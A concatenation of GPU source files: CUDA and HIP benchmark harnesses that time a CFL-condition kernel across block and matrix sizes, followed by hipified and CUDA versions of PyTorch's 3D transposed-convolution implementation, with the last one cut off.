newDT,DT2D,DT1D,Vmoy,invRmed,CFL,nsec,nrad,DeltaT); hipDeviceSynchronize(); for (int loop_counter = 0; loop_counter < 10; ++loop_counter) {hipLaunchKernelGGL(( ConditionCFLKernel2D3), dim3(gridBlock),dim3(threadBlock), 0, 0, newDT,DT2D,DT1D,Vmoy,invRmed,CFL,nsec,nrad,DeltaT); } auto start = steady_clock::now(); for (int loop_counter = 0; loop_counter < 1000; loop_counter++) {hipLaunchKernelGGL(( ConditionCFLKernel2D3), dim3(gridBlock),dim3(threadBlock), 0, 0, newDT,DT2D,DT1D,Vmoy,invRmed,CFL,nsec,nrad,DeltaT); } auto end = steady_clock::now(); auto usecs = duration_cast<duration<float, microseconds::period> >(end - start); cout <<'['<<usecs.count()<<','<<'('<<BLOCKX<<','<<BLOCKY<<')' << ','<<'('<<XSIZE<<','<<YSIZE<<')'<<']' << endl; } }}
7e894159984ba9b466baaae8280d22a4b94c4862.cu
#include <stdbool.h> #include <stdio.h> #include <string.h> #include <getopt.h> #include <curand_kernel.h> #include <stdlib.h> #include <cuda.h> #include <sys/time.h> #include "ConditionCFLKernel2D3.cu" #include<chrono> #include<iostream> using namespace std; using namespace std::chrono; int blocks_[20][2] = {{8,8},{16,16},{24,24},{32,32},{1,64},{1,128},{1,192},{1,256},{1,320},{1,384},{1,448},{1,512},{1,576},{1,640},{1,704},{1,768},{1,832},{1,896},{1,960},{1,1024}}; int matrices_[7][2] = {{240,240},{496,496},{784,784},{1016,1016},{1232,1232},{1680,1680},{2024,2024}}; int main(int argc, char **argv) { cudaSetDevice(0); char* p;int matrix_len=strtol(argv[1], &p, 10); for(int matrix_looper=0;matrix_looper<matrix_len;matrix_looper++){ for(int block_looper=0;block_looper<20;block_looper++){ int XSIZE=matrices_[matrix_looper][0],YSIZE=matrices_[matrix_looper][1],BLOCKX=blocks_[block_looper][0],BLOCKY=blocks_[block_looper][1]; double *newDT = NULL; cudaMalloc(&newDT, XSIZE*YSIZE); double *DT2D = NULL; cudaMalloc(&DT2D, XSIZE*YSIZE); double *DT1D = NULL; cudaMalloc(&DT1D, XSIZE*YSIZE); double *Vmoy = NULL; cudaMalloc(&Vmoy, XSIZE*YSIZE); double *invRmed = NULL; cudaMalloc(&invRmed, XSIZE*YSIZE); int *CFL = NULL; cudaMalloc(&CFL, XSIZE*YSIZE); int nsec = 1; int nrad = 1; double DeltaT = 1; int iXSIZE= XSIZE; int iYSIZE= YSIZE; while(iXSIZE%BLOCKX!=0) { iXSIZE++; } while(iYSIZE%BLOCKY!=0) { iYSIZE++; } dim3 gridBlock(iXSIZE/BLOCKX, iYSIZE/BLOCKY); dim3 threadBlock(BLOCKX, BLOCKY); cudaFree(0); ConditionCFLKernel2D3<<<gridBlock,threadBlock>>>(newDT,DT2D,DT1D,Vmoy,invRmed,CFL,nsec,nrad,DeltaT); cudaDeviceSynchronize(); for (int loop_counter = 0; loop_counter < 10; ++loop_counter) { ConditionCFLKernel2D3<<<gridBlock,threadBlock>>>(newDT,DT2D,DT1D,Vmoy,invRmed,CFL,nsec,nrad,DeltaT); } auto start = steady_clock::now(); for (int loop_counter = 0; loop_counter < 1000; loop_counter++) { ConditionCFLKernel2D3<<<gridBlock,threadBlock>>>(newDT,DT2D,DT1D,Vmoy,invRmed,CFL,nsec,nrad,DeltaT); } auto end = steady_clock::now(); auto usecs = duration_cast<duration<float, microseconds::period> >(end - start); cout <<'['<<usecs.count()<<','<<'('<<BLOCKX<<','<<BLOCKY<<')' << ','<<'('<<XSIZE<<','<<YSIZE<<')'<<']' << endl; } }}
ba8920157a70a1e6dfdae4fa3316bf8e001761cd.hip
// !!! This is a file automatically generated by hipify!!! #define TORCH_ASSERT_ONLY_METHOD_OPERATORS #include <ATen/core/Tensor.h> #include <ATen/AccumulateType.h> #include <ATen/Dispatch.h> #include <ATen/TensorUtils.h> #include <ATen/Utils.h> #include <ATen/hip/HIPBlas.h> #include <ATen/hip/HIPContext.h> #include <ATen/native/ConvUtils.h> #include <ATen/native/hip/vol2col.cuh> #ifndef AT_PER_OPERATOR_HEADERS #include <ATen/Functions.h> #include <ATen/NativeFunctions.h> #else #include <ATen/ops/empty.h> #include <ATen/ops/empty_like.h> #include <ATen/ops/sum.h> #include <ATen/ops/ones.h> #include <ATen/ops/slow_conv_transpose3d_native.h> #endif namespace at::native { namespace { static inline void slow_conv_transpose3d_shape_check( const Tensor& input, const Tensor& grad_output, const Tensor& weight, const Tensor& bias, int kernel_depth, int kernel_width, int kernel_height, int stride_depth, int stride_width, int stride_height, int padding_depth, int padding_width, int padding_height, int dilation_depth, int dilation_width, int dilation_height, int output_padding_depth, int output_padding_width, int output_padding_height, int weight_nullable) { TORCH_CHECK( input.numel() != 0 && (input.dim() == 4 || input.dim() == 5), "non-empty 4D or 5D (batch mode) tensor expected for input, but got: ", input.sizes()); TORCH_CHECK( stride_depth > 0 && stride_width > 0 && stride_height > 0, "stride should be greater than zero, but got stride_depth: ", stride_depth, " stride_height: ", stride_height, " stride_width: ", stride_width); TORCH_CHECK( dilation_depth > 0 && dilation_width > 0 && dilation_height > 0, "dilation should be greater than zero, but got dilation_depth: ", dilation_depth, ", dilation_height: ", dilation_height, ", dilation_width: ", dilation_width); TORCH_CHECK( (output_padding_depth < stride_depth || output_padding_depth < dilation_depth) && (output_padding_width < stride_width || output_padding_width < dilation_width) && (output_padding_height < stride_height || output_padding_height < dilation_height), "output padding must be smaller than either stride or dilation,", " but got output_padding_depth: ", output_padding_depth, " output_padding_height: ", output_padding_height, " output_padding_width: ", output_padding_width, " stride_depth: ", stride_depth, " stride_height: ", stride_height, " stride_width: ", stride_width, " dilation_depth: ", dilation_depth, " dilation_height: ", dilation_height, " dilation_width: ", dilation_width); // number of input & output planes and kernel size is indirectly defined by // the weight tensor if (weight.defined()) { TORCH_CHECK( weight.numel() != 0 && weight.dim() == 5, "non-empty 5D (n_output_plane x n_input_plane ", "x kernel_depth x kernel_height x kernel_width) tensor ", "expected for weight, but got: ", weight.sizes()); if (bias.defined()) { check_dim_size(bias, 1, 0, weight.size(1)); } } else if (!weight_nullable) { AT_ERROR("weight tensor is expected to be non-nullable"); } int ndim = input.dim(); int dimf = 0; int dimd = 1; int dimh = 2; int dimw = 3; if (ndim == 5) { dimf++; dimd++; dimh++; dimw++; } if (weight.defined()) { const int64_t n_input_plane = weight.size(0); check_dim_size(input, ndim, dimf, n_input_plane); } int64_t input_width = input.size(dimw); int64_t input_height = input.size(dimh); int64_t input_depth = input.size(dimd); int64_t output_depth = (input_depth - 1) * stride_depth - 2 * padding_depth + (dilation_depth * (kernel_depth - 1) + 1) + output_padding_depth; int64_t output_height = (input_height - 1) * stride_height - 2 * padding_height + (dilation_height * (kernel_height - 1) + 1) + output_padding_height; int64_t output_width = (input_width - 1) * stride_width - 2 * padding_width + (dilation_width * (kernel_width - 1) + 1) + output_padding_width; if (output_depth < 1 || output_width < 1 || output_height < 1) { AT_ERROR( "Given input size per channel: (", input_depth, " x ", input_height, " x ", input_width, "). Calculated output size per channel: (", output_depth, " x ", output_height, " x ", output_width, "). Output size is too small"); } if (grad_output.defined()) { if (weight.defined()) { const int64_t n_output_plane = weight.size(1); check_dim_size(grad_output, ndim, dimf, n_output_plane); } else if (bias.defined()) { const int64_t n_output_plane = bias.size(0); check_dim_size(grad_output, ndim, dimf, n_output_plane); } check_dim_size(grad_output, ndim, dimd, output_depth); check_dim_size(grad_output, ndim, dimh, output_height); check_dim_size(grad_output, ndim, dimw, output_width); } } void slow_conv_transpose3d_out_cuda_template( Tensor& output, const Tensor& input_, const Tensor& weight_, IntArrayRef kernel_size, const Tensor& bias_, IntArrayRef stride, IntArrayRef padding, IntArrayRef output_padding, IntArrayRef dilation) { TORCH_CHECK( kernel_size.size() == 3, "It is expected kernel_size equals to 3, but got size ", kernel_size.size()); TORCH_CHECK( dilation.size() == 3, "It is expected dilation equals to 3, but got size ", dilation.size()); TORCH_CHECK( padding.size() == 3, "It is expected padding equals to 3, but got size ", padding.size()); TORCH_CHECK( stride.size() == 3, "It is expected stride equals to 3, but got size ", stride.size()); TORCH_CHECK( output_padding.size() == 3, "It is expected stride equals to 3, but got size ", output_padding.size()); int64_t kernel_depth = kernel_size[0]; int64_t kernel_height = kernel_size[1]; int64_t kernel_width = kernel_size[2]; int64_t dilation_depth = dilation[0]; int64_t dilation_height = dilation[1]; int64_t dilation_width = dilation[2]; int64_t padding_depth = padding[0]; int64_t padding_height = padding[1]; int64_t padding_width = padding[2]; int64_t stride_depth = stride[0]; int64_t stride_height = stride[1]; int64_t stride_width = stride[2]; int64_t output_padding_depth = output_padding[0]; int64_t output_padding_height = output_padding[1]; int64_t output_padding_width = output_padding[2]; int n_input_plane = weight_.size(0); int n_output_plane = weight_.size(1); TensorArg input_arg{input_, "input", 1}, output_arg{output, "output", 2}, weight_arg{weight_, "weight", 3}, bias_arg{bias_, "bias", 4}; checkAllSameGPU( "slow_conv_transpose3d_out_cuda", {input_arg, output_arg, weight_arg, bias_arg}); slow_conv_transpose3d_shape_check( input_, Tensor(), weight_, bias_, kernel_depth, kernel_width, kernel_height, stride_depth, stride_width, stride_height, padding_depth, padding_width, padding_height, dilation_depth, dilation_width, dilation_height, output_padding_depth, output_padding_width, output_padding_height, 0); Tensor input = input_.contiguous(); Tensor weight = weight_.contiguous(); Tensor bias = bias_.defined() ? bias_.contiguous() : bias_; int is_batch = false; if (input.dim() == 4) { // Force batch is_batch = true; input.resize_( {1, input.size(0), input.size(1), input.size(2), input.size(3)}); } int64_t input_width = input.size(4); int64_t input_height = input.size(3); int64_t input_depth = input.size(2); int64_t output_depth = (input_depth - 1) * stride_depth - 2 * padding_depth + (dilation_depth * (kernel_depth - 1) + 1) + output_padding_depth; int64_t output_height = (input_height - 1) * stride_height - 2 * padding_height + (dilation_height * (kernel_height - 1) + 1) + output_padding_height; int64_t output_width = (input_width - 1) * stride_width - 2 * padding_width + (dilation_width * (kernel_width - 1) + 1) + output_padding_width; // Batch size + input planes int64_t batch_size = input.size(0); // Resize output output.resize_( {batch_size, n_output_plane, output_depth, output_height, output_width}); // Create temporary columns Tensor columns = at::empty({n_output_plane * kernel_width * kernel_height * kernel_depth, input_depth * input_height * input_width}, input.options()); // Define a buffer of ones, for bias accumulation Tensor ones = bias.defined() ? at::ones({output_depth, output_height, output_width}, input_.options()) : Tensor(); AT_DISPATCH_FLOATING_TYPES_AND2(kHalf, kBFloat16, input.scalar_type(), "slow_conv_transpose3d_out_cuda", [&] { using accscalar_t = at::acc_type<scalar_t, true>; // Helpers Tensor input_n; Tensor output_n; // For each elt in batch, do: for (int elt = 0; elt < batch_size; elt++) { // Matrix mulitply per output: input_n = input.select(0, elt); output_n = output.select(0, elt); // M,N,K are dims of matrix A and B // (see http://docs.nvidia.com/cuda/cublas/#cublas-lt-t-gt-gemm) int64_t m = weight.size(1) * weight.size(2) * weight.size(3) * weight.size(4); int64_t n = columns.size(1); int64_t k = weight.size(0); // Do GEMM (note: this is a bit confusing because gemm assumes // column-major matrices) at::cuda::blas::gemm<scalar_t>( 'n', 't', n, m, k, static_cast<scalar_t>(1), input_n.const_data_ptr<scalar_t>(), n, weight.const_data_ptr<scalar_t>(), m, static_cast<scalar_t>(0), columns.mutable_data_ptr<scalar_t>(), n); // Unpack columns back into input: at::native::col2vol<scalar_t, accscalar_t>( at::hip::getCurrentHIPStreamMasqueradingAsCUDA(), columns.const_data_ptr<scalar_t>(), n_output_plane, output_depth, output_height, output_width, input_depth, input_height, input_width, kernel_depth, kernel_height, kernel_width, padding_depth, padding_height, padding_width, stride_depth, stride_height, stride_width, dilation_depth, dilation_height, dilation_width, output_n.mutable_data_ptr<scalar_t>()); // Do Bias after: // M,N,K are dims of matrix A and B // (see http://docs.nvidia.com/cuda/cublas/#cublas-lt-t-gt-gemm) int64_t m_ = n_output_plane; int64_t n_ = output_depth * output_height * output_width; int64_t k_ = 1; // Do GEMM (note: this is a bit confusing because gemm assumes // column-major matrices) if (bias.defined()) { at::cuda::blas::gemm<scalar_t>( 't', 'n', n_, m_, k_, static_cast<scalar_t>(1), ones.const_data_ptr<scalar_t>(), k_, bias.const_data_ptr<scalar_t>(), k_, static_cast<scalar_t>(1), output_n.mutable_data_ptr<scalar_t>(), n_); } } // Resize output if (is_batch) { output.resize_( {n_output_plane, output_depth, output_height, output_width}); input.resize_( {n_input_plane, input_depth, input_height, input_width}); } }); } void slow_conv_transpose3d_backward_out_cuda_template( const Tensor& input_, const Tensor& grad_output_, Tensor& grad_input, const Tensor& weight_, IntArrayRef kernel_size, IntArrayRef stride, IntArrayRef padding, IntArrayRef output_padding, IntArrayRef dilation) { TORCH_CHECK( kernel_size.size() == 3, "It is expected kernel_size equals to 3, but got size ", kernel_size.size()); TORCH_CHECK( dilation.size() == 3, "It is expected dilation equals to 3, but got size ", dilation.size()); TORCH_CHECK( padding.size() == 3, "It is expected padding equals to 3, but got size ", padding.size()); TORCH_CHECK( stride.size() == 3, "It is expected stride equals to 3, but got size ", stride.size()); TORCH_CHECK( output_padding.size() == 3, "It is expected stride equals to 3, but got size ", output_padding.size()); int n_input_plane = weight_.size(0); int n_output_plane = weight_.size(1); int64_t kernel_depth = kernel_size[0]; int64_t kernel_height = kernel_size[1]; int64_t kernel_width = kernel_size[2]; int64_t dilation_depth = dilation[0]; int64_t dilation_height = dilation[1]; int64_t dilation_width = dilation[2]; int64_t padding_depth = padding[0]; int64_t padding_height = padding[1]; int64_t padding_width = padding[2]; int64_t stride_depth = stride[0]; int64_t stride_height = stride[1]; int64_t stride_width = stride[2]; int64_t output_padding_depth = output_padding[0]; int64_t output_padding_height = output_padding[1]; int64_t output_padding_width = output_padding[2]; TensorArg input_arg{input_, "input", 1}, grad_output_arg{grad_output_, "grad_output", 2}, weight_arg{weight_, "weight", 3}, grad_input_arg{grad_input, "grad_input", 4}; checkAllSameGPU( "slow_conv_transpose3d_backward_out_cuda", {input_arg, grad_output_arg, weight_arg, grad_input_arg}); slow_conv_transpose3d_shape_check( input_, grad_output_, weight_, Tensor(), kernel_depth, kernel_width, kernel_height, stride_depth, stride_width, stride_height, padding_depth, padding_width, padding_height, dilation_depth, dilation_width, dilation_height, output_padding_depth, output_padding_width, output_padding_height, 0); Tensor input = input_.contiguous(); Tensor grad_output = grad_output_.contiguous(); Tensor weight = weight_.contiguous(); bool is_batch = false; if (input.dim() == 4) { // Force batch is_batch = true; input.resize_( {1, input.size(0), input.size(1), input.size(2), input.size(3)}); grad_output.resize_({1, grad_output.size(0), grad_output.size(1), grad_output.size(2), grad_output.size(3)}); } int64_t input_width = input.size(4); int64_t input_height = input.size(3); int64_t input_depth = input.size(2); int64_t output_depth = (input_depth - 1) * stride_depth - 2 * padding_depth + (dilation_depth * (kernel_depth - 1) + 1) + output_padding_depth; int64_t output_height = (input_height - 1) * stride_height - 2 * padding_height + (dilation_height * (kernel_height - 1) + 1) + output_padding_height; int64_t output_width = (input_width - 1) * stride_width - 2 * padding_width + (dilation_width * (kernel_width - 1) + 1) + output_padding_width; // Batch size + input planes int64_t batch_size = input.size(0); // Resize output grad_input.resize_( {batch_size, n_input_plane, input_depth, input_height, input_width}); // Create temporary columns bool need_columns = (kernel_depth != 1 || kernel_height != 1 || kernel_width != 1 || stride_depth != 1 || stride_height != 1 || stride_width != 1 || dilation_depth != 1 || dilation_height != 1 || dilation_width != 1 || padding_depth != 0 || padding_height != 0 || padding_width != 0); Tensor grad_columns = need_columns ? at::empty({n_output_plane * kernel_width * kernel_height * kernel_depth, input_depth * input_height * input_width}, input.options()) : Tensor(); AT_DISPATCH_FLOATING_TYPES_AND2(kHalf, kBFloat16, input.scalar_type(), "slow_conv_transpose3d_backward_out_cuda", [&] { // Helpers Tensor grad_input_n; Tensor grad_output_n; // For each elt in batch, do: for (int elt = 0; elt < batch_size; elt++) { // Matrix mulitply per sample: grad_input_n = grad_input.select(0, elt); grad_output_n = grad_output.select(0, elt); if (need_columns) { // Extract columns: at::native::vol2col<scalar_t>( at::hip::getCurrentHIPStreamMasqueradingAsCUDA(), grad_output_n.const_data_ptr<scalar_t>(), n_output_plane, output_depth, output_height, output_width, input_depth, input_height, input_width, kernel_depth, kernel_height, kernel_width, padding_depth, padding_height, padding_width, stride_depth, stride_height, stride_width, dilation_depth, dilation_height, dilation_width, grad_columns.mutable_data_ptr<scalar_t>()); } // M,N,K are dims of matrix A and B // (see http://docs.nvidia.com/cuda/cublas/#cublas-lt-t-gt-gemm) int64_t m = weight.size(0); int64_t n = input_depth * input_height * input_width; int64_t k = weight.size(1) * weight.size(2) * weight.size(3) * weight.size(4); // Do GEMM (note: this is a bit confusing because gemm assumes // column-major matrices) auto gemm_in_ptr = need_columns ? grad_columns.const_data_ptr<scalar_t>() : grad_output_n.const_data_ptr<scalar_t>(); at::cuda::blas::gemm<scalar_t>( 'n', 'n', n, m, k, static_cast<scalar_t>(1), gemm_in_ptr, n, weight.const_data_ptr<scalar_t>(), k, static_cast<scalar_t>(0), grad_input_n.mutable_data_ptr<scalar_t>(), n); } // Resize output if (is_batch) { grad_output.resize_( {n_output_plane, output_depth, output_height, output_width}); input.resize_( {n_input_plane, input_depth, input_height, input_width}); grad_input.resize_( {n_input_plane, input_depth, input_height, input_width}); } }); } void slow_conv_transpose3d_acc_grad_parameters_cuda( const Tensor& input_, const Tensor& grad_output_, Tensor& grad_weight, Tensor& grad_bias, IntArrayRef kernel_size, IntArrayRef stride, IntArrayRef padding, IntArrayRef output_padding, IntArrayRef dilation, int scale_) { TORCH_CHECK( kernel_size.size() == 3, "It is expected kernel_size equals to 3, but got size ", kernel_size.size()); TORCH_CHECK( dilation.size() == 3, "It is expected dilation equals to 3, but got size ", dilation.size()); TORCH_CHECK( padding.size() == 3, "It is expected padding equals to 3, but got size ", padding.size()); TORCH_CHECK( stride.size() == 3, "It is expected stride equals to 3, but got size ", stride.size()); TORCH_CHECK( output_padding.size() == 3, "It is expected stride equals to 3, but got size ", output_padding.size()); int64_t kernel_depth = kernel_size[0]; int64_t kernel_height = kernel_size[1]; int64_t kernel_width = kernel_size[2]; int64_t dilation_depth = dilation[0]; int64_t dilation_height = dilation[1]; int64_t dilation_width = dilation[2]; int64_t padding_depth = padding[0]; int64_t padding_height = padding[1]; int64_t padding_width = padding[2]; int64_t stride_depth = stride[0]; int64_t stride_height = stride[1]; int64_t stride_width = stride[2]; int64_t output_padding_depth = output_padding[0]; int64_t output_padding_height = output_padding[1]; int64_t output_padding_width = output_padding[2]; TensorArg input_arg{input_, "input", 1}, grad_output_arg{grad_output_, "grad_output", 2}, grad_weight_arg{grad_weight, "grad_weight", 3}, grad_bias_arg{grad_bias, "grad_bias", 4}; checkAllSameGPU( "slow_conv_transpose3d_acc_grad_parameters_cuda", {input_arg, grad_output_arg, grad_weight_arg, grad_bias_arg}); slow_conv_transpose3d_shape_check( input_, grad_output_, grad_weight, grad_bias, kernel_depth, kernel_width, kernel_height, stride_depth, stride_width, stride_height, padding_depth, padding_width, padding_height, dilation_depth, dilation_width, dilation_height, output_padding_depth, output_padding_width, output_padding_height, 1); int n_output_plane; if (grad_weight.defined()) { n_output_plane = grad_weight.size(1); } else if (grad_bias.defined()) { n_output_plane = grad_bias.size(0); } else { return; } if (grad_weight.defined()) { TORCH_CHECK( grad_weight.is_contiguous(), "grad_weight needs to be contiguous"); } if (grad_bias.defined()) { TORCH_CHECK(grad_bias.is_contiguous(), "grad_bias needs to be contiguous"); } Tensor input = input_.contiguous(); Tensor grad_output = grad_output_.contiguous(); bool is_batch = false; if (input.dim() == 4) { // Force batch is_batch = true; input.resize_( {1, input.size(0), input.size(1), input.size(2), input.size(3)}); grad_output.resize_({1, grad_output.size(0), grad_output.size(1), grad_output.size(2), grad_output.size(3)}); } int64_t input_width = input.size(4); int64_t input_height = input.size(3); int64_t input_depth = input.size(2); int64_t output_depth = (input_depth - 1) * stride_depth - 2 * padding_depth + (dilation_depth * (kernel_depth - 1) + 1) + output_padding_depth; int64_t output_height = (input_height - 1) * stride_height - 2 * padding_height + (dilation_height * (kernel_height - 1) + 1) + output_padding_height; int64_t output_width = (input_width - 1) * stride_width - 2 * padding_width + (dilation_width * (kernel_width - 1) + 1) + output_padding_width; // Batch size + input planes int64_t batch_size = input.size(0); // Create temporary columns bool need_columns = (kernel_depth != 1 || kernel_height != 1 || kernel_width != 1 || stride_depth != 1 || stride_height != 1 || stride_width != 1 || dilation_depth != 1 || dilation_height != 1 || dilation_width != 1 || padding_depth != 0 || padding_height != 0 || padding_width != 0); Tensor columns = need_columns ? at::empty({n_output_plane * kernel_width * kernel_height * kernel_depth, input_depth * input_height * input_width}, input.options()) : Tensor(); AT_DISPATCH_FLOATING_TYPES_AND2(kHalf, kBFloat16, input.scalar_type(), "slow_conv_transpose3d_acc_grad_parameters_cuda", [&] { // Helpers Tensor input_n; Tensor grad_output_n; scalar_t scale = static_cast<scalar_t>(scale_); // For each elt in batch, do: for (int elt = 0; elt < batch_size; elt++) { // Matrix mulitply per output: grad_output_n = grad_output.select(0, elt); // Do Weight: if (grad_weight.defined()) { // Matrix mulitply per output: input_n = input.select(0, elt); if (need_columns) { // Extract columns: at::native::vol2col<scalar_t>( at::hip::getCurrentHIPStreamMasqueradingAsCUDA(), grad_output_n.const_data_ptr<scalar_t>(), n_output_plane, output_depth, output_height, output_width, input_depth, input_height, input_width, kernel_depth, kernel_height, kernel_width, padding_depth, padding_height, padding_width, stride_depth, stride_height, stride_width, dilation_depth, dilation_height, dilation_width, columns.mutable_data_ptr<scalar_t>()); } // M,N,K are dims of matrix A and B // (see http://docs.nvidia.com/cuda/cublas/#cublas-lt-t-gt-gemm) int64_t n = n_output_plane * kernel_width * kernel_height * kernel_depth; int64_t m = input_n.size(0); // n_input_plane int64_t k = input_depth * input_height * input_width; // Do GEMM (note: this is a bit confusing because gemm assumes // column-major matrices) auto gemm_in_ptr = need_columns ? columns.const_data_ptr<scalar_t>() : grad_output_n.const_data_ptr<scalar_t>(); at::cuda::blas::gemm<scalar_t>( 't', 'n', n, m, k, scale, gemm_in_ptr, k, input_n.const_data_ptr<scalar_t>(), k, static_cast<scalar_t>(1), grad_weight.mutable_data_ptr<scalar_t>(), n); } } if (grad_bias.defined()) { at::sum_out(grad_bias, grad_output, IntArrayRef{0, 2, 3, 4}); } // Resize if (is_batch) { grad_output.resize_( {n_output_plane, output_depth, output_height, output_width}); input.resize_( {input.size(1), input_depth, input_height, input_width}); } }); } } // namespace Tensor& slow_conv_transpose3d_out_cuda(const Tensor& input, const Tensor& weight, IntArrayRef kernel_size, const c10::optional<Tensor>& bias_opt, IntArrayRef stride, IntArrayRef padding, IntArrayRef output_padding, IntArrayRef dilation, Tensor& output) { // See [Note: hacky wrapper removal for optional tensor] c10::MaybeOwned<Tensor> bias_maybe_owned = at::borrow_from_optional_tensor(bias_opt); const Tensor& bias = *bias_maybe_owned; slow_conv_transpose3d_out_cuda_template( output, input, weight, kernel_size, bias, stride, padding, output_padding, dilation); return output; } Tensor slow_conv_transpose3d_cuda( const Tensor& input, const Tensor& weight, IntArrayRef kernel_size, const c10::optional<Tensor>& bias_opt, IntArrayRef stride, IntArrayRef padding, IntArrayRef output_padding, IntArrayRef dilation) { // See [Note: hacky wrapper removal for optional tensor] c10::MaybeOwned<Tensor> bias_maybe_owned = at::borrow_from_optional_tensor(bias_opt); const Tensor& bias = *bias_maybe_owned; Tensor output = at::empty_like(input, LEGACY_CONTIGUOUS_MEMORY_FORMAT); slow_conv_transpose3d_out_cuda_template( output, input, weight, kernel_size, bias, stride, padding, output_padding, dilation); return output; } std::tuple<Tensor&, Tensor&, Tensor&> slow_conv_transpose3d_backward_out_cuda(const Tensor& grad_output, const Tensor& input, const Tensor& weight, IntArrayRef kernel_size, IntArrayRef stride, IntArrayRef padding, IntArrayRef output_padding, IntArrayRef dilation, Tensor& grad_input, Tensor& grad_weight, Tensor& grad_bias) { if (grad_input.defined()) { slow_conv_transpose3d_backward_out_cuda_template( input, grad_output, grad_input, weight, kernel_size, stride, padding, output_padding, dilation); } if (grad_weight.defined()) { grad_weight.resize_(weight.sizes()); grad_weight.zero_(); } if (grad_bias.defined()) { grad_bias.resize_({weight.size(1)}); grad_bias.zero_(); } if (grad_weight.defined() || grad_bias.defined()) { slow_conv_transpose3d_acc_grad_parameters_cuda( input, grad_output, grad_weight, grad_bias, kernel_size, stride, padding, output_padding, dilation, 1); } return std::tuple<Tensor&, Tensor&, Tensor&>( grad_input, grad_weight, grad_bias); } std::tuple<Tensor, Tensor, Tensor> slow_conv_transpose3d_backward_cuda( const Tensor& grad_output, const Tensor& input, const Tensor& weight, IntArrayRef kernel_size, IntArrayRef stride, IntArrayRef padding, IntArrayRef output_padding, IntArrayRef dilation, std::array<bool, 3> output_mask) { Tensor grad_input; Tensor grad_weight; Tensor grad_bias; if (output_mask[0]) { grad_input = at::empty({0}, grad_output.options()); } else { grad_input = Tensor(); } if (output_mask[1]) { grad_weight = at::empty({0}, grad_output.options()); } else { grad_weight = Tensor(); } if (output_mask[2]) { grad_bias = at::empty({0}, grad_output.options()); } else { grad_bias = Tensor(); } if (grad_input.defined()) { slow_conv_transpose3d_backward_out_cuda_template( input, grad_output, grad_input, weight, kernel_size, stride, padding, output_padding, dilation); } if (grad_weight.defined()) { grad_weight.resize_(weight.sizes()); grad_weight.zero_(); } if (grad_bias.defined()) { grad_bias.resize_({weight.size(1)}); grad_bias.zero_(); } if (grad_weight.defined() || grad_bias.defined()) { slow_conv_transpose3d_acc_grad_parameters_cuda( input, grad_output, grad_weight, grad_bias, kernel_size, stride, padding, output_padding, dilation, 1); } return std::tuple<Tensor, Tensor, Tensor>(grad_input, grad_weight, grad_bias); } REGISTER_CUDA_DISPATCH(slow_conv_transpose3d_backward_stub, &slow_conv_transpose3d_backward_cuda); } // namespace at::native
ba8920157a70a1e6dfdae4fa3316bf8e001761cd.cu
#define TORCH_ASSERT_ONLY_METHOD_OPERATORS #include <ATen/core/Tensor.h> #include <ATen/AccumulateType.h> #include <ATen/Dispatch.h> #include <ATen/TensorUtils.h> #include <ATen/Utils.h> #include <ATen/cuda/CUDABlas.h> #include <ATen/cuda/CUDAContext.h> #include <ATen/native/ConvUtils.h> #include <ATen/native/cuda/vol2col.cuh> #ifndef AT_PER_OPERATOR_HEADERS #include <ATen/Functions.h> #include <ATen/NativeFunctions.h> #else #include <ATen/ops/empty.h> #include <ATen/ops/empty_like.h> #include <ATen/ops/sum.h> #include <ATen/ops/ones.h> #include <ATen/ops/slow_conv_transpose3d_native.h> #endif namespace at::native { namespace { static inline void slow_conv_transpose3d_shape_check( const Tensor& input, const Tensor& grad_output, const Tensor& weight, const Tensor& bias, int kernel_depth, int kernel_width, int kernel_height, int stride_depth, int stride_width, int stride_height, int padding_depth, int padding_width, int padding_height, int dilation_depth, int dilation_width, int dilation_height, int output_padding_depth, int output_padding_width, int output_padding_height, int weight_nullable) { TORCH_CHECK( input.numel() != 0 && (input.dim() == 4 || input.dim() == 5), "non-empty 4D or 5D (batch mode) tensor expected for input, but got: ", input.sizes()); TORCH_CHECK( stride_depth > 0 && stride_width > 0 && stride_height > 0, "stride should be greater than zero, but got stride_depth: ", stride_depth, " stride_height: ", stride_height, " stride_width: ", stride_width); TORCH_CHECK( dilation_depth > 0 && dilation_width > 0 && dilation_height > 0, "dilation should be greater than zero, but got dilation_depth: ", dilation_depth, ", dilation_height: ", dilation_height, ", dilation_width: ", dilation_width); TORCH_CHECK( (output_padding_depth < stride_depth || output_padding_depth < dilation_depth) && (output_padding_width < stride_width || output_padding_width < dilation_width) && (output_padding_height < stride_height || output_padding_height < dilation_height), "output padding must be smaller than either stride or dilation,", " but got output_padding_depth: ", output_padding_depth, " output_padding_height: ", output_padding_height, " output_padding_width: ", output_padding_width, " stride_depth: ", stride_depth, " stride_height: ", stride_height, " stride_width: ", stride_width, " dilation_depth: ", dilation_depth, " dilation_height: ", dilation_height, " dilation_width: ", dilation_width); // number of input & output planes and kernel size is indirectly defined by // the weight tensor if (weight.defined()) { TORCH_CHECK( weight.numel() != 0 && weight.dim() == 5, "non-empty 5D (n_output_plane x n_input_plane ", "x kernel_depth x kernel_height x kernel_width) tensor ", "expected for weight, but got: ", weight.sizes()); if (bias.defined()) { check_dim_size(bias, 1, 0, weight.size(1)); } } else if (!weight_nullable) { AT_ERROR("weight tensor is expected to be non-nullable"); } int ndim = input.dim(); int dimf = 0; int dimd = 1; int dimh = 2; int dimw = 3; if (ndim == 5) { dimf++; dimd++; dimh++; dimw++; } if (weight.defined()) { const int64_t n_input_plane = weight.size(0); check_dim_size(input, ndim, dimf, n_input_plane); } int64_t input_width = input.size(dimw); int64_t input_height = input.size(dimh); int64_t input_depth = input.size(dimd); int64_t output_depth = (input_depth - 1) * stride_depth - 2 * padding_depth + (dilation_depth * (kernel_depth - 1) + 1) + output_padding_depth; int64_t output_height = (input_height - 1) * stride_height - 2 * padding_height + (dilation_height * (kernel_height - 1) + 1) + output_padding_height; int64_t output_width = (input_width - 1) * stride_width - 2 * padding_width + (dilation_width * (kernel_width - 1) + 1) + output_padding_width; if (output_depth < 1 || output_width < 1 || output_height < 1) { AT_ERROR( "Given input size per channel: (", input_depth, " x ", input_height, " x ", input_width, "). Calculated output size per channel: (", output_depth, " x ", output_height, " x ", output_width, "). Output size is too small"); } if (grad_output.defined()) { if (weight.defined()) { const int64_t n_output_plane = weight.size(1); check_dim_size(grad_output, ndim, dimf, n_output_plane); } else if (bias.defined()) { const int64_t n_output_plane = bias.size(0); check_dim_size(grad_output, ndim, dimf, n_output_plane); } check_dim_size(grad_output, ndim, dimd, output_depth); check_dim_size(grad_output, ndim, dimh, output_height); check_dim_size(grad_output, ndim, dimw, output_width); } } void 